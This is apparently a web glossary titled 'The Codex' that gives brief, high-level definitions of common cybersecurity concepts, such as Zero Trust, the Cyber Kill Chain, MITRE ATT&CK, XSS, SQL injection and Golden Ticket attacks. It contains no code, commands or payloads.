THE CODEX
The cognitive armory. Mastering concepts to master the battlefield.
Zero Trust
Never trust, always verify
A security model that assumes threats are present both inside and outside the network. No user or device is trusted by default, regardless of location.
Cyber Kill Chain
The anatomy of an attack
Model developed by Lockheed Martin describing the 7 stages of a cyberattack: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command & Control (C2), Actions on Objectives.
MITRE ATT&CK
The encyclopedia of tactics
A global knowledge base of adversary tactics and techniques (TTPs) based on real-world observations. Used to classify and describe cyberattacks.
Red vs Blue Teaming
The art of simulated war
The Red Team simulates the attacker (OPFOR) to test defenses. The Blue Team defends the infrastructure. The Purple Team ensures cooperation and knowledge sharing between the two.
CIA Triad
The three pillars of security
Confidentiality (only authorized access), Integrity (data unaltered), Availability (access guaranteed when needed). The foundation of any security policy.
Defense in Depth
The castle strategy
Layering multiple security measures (firewall, IDS, encryption, training) so that a failure in one does not compromise the entire system.
OSINT
Open Source Intelligence
The collection and analysis of publicly available information (social media, DNS, whois) to gather intelligence on a target. The primary weapon of reconnaissance.
Honeypot
The hacker trap
A decoy system intentionally left vulnerable designed to attract attackers, detect intrusion attempts, and analyze their behavior without risking production systems.
Ransomware
Digital hostage taking
Malware that encrypts the victim's data and demands a ransom (usually in cryptocurrency) to restore access. Often coupled with a threat of disclosure (Double Extortion).
Zero-Day
The dangerous unknown
A software vulnerability unknown to the vendor and for which no patch exists yet. Zero-Day exploits are highly prized and expensive on the black market.
Air Gap
Physical isolation
A security measure consisting of physically isolating a secure network from any other network, including the Internet. Used for critical systems (nuclear, military).
Social Engineering
Human hacking
The art of manipulating people into divulging confidential information or performing actions that compromise security. Often more effective than technical attacks.
Golden Ticket
Key to the kingdom
In an Active Directory environment, a forged Kerberos ticket that gives the attacker unlimited and persistent access to the entire domain.
SIEM
The control tower
Security Information and Event Management. A solution that aggregates and analyzes security logs in real-time to detect anomalies and incidents.
DLP
Leak prevention
Data Loss Prevention. Strategies and tools to ensure that sensitive data does not leave the corporate network unauthorized.
XSS
Cross-Site Scripting
A web vulnerability allowing the injection of malicious code (often JavaScript) into web pages viewed by other users.
SQL Injection
Database injection
An attack technique that exploits a security flaw in an application's database layer to interfere with queries, steal or delete data.
Lateral Movement
Internal expansion
Techniques used by attackers to move progressively through a network after compromising an initial machine, searching for high-value targets.
Least Privilege
Principle of least privilege
The concept that a user or process should only have the rights strictly necessary to perform their task, and no more.
Supply Chain Attack
Logistics chain attack
Targeting less secure elements of an organization's supply chain (suppliers, third-party software) to compromise the final target.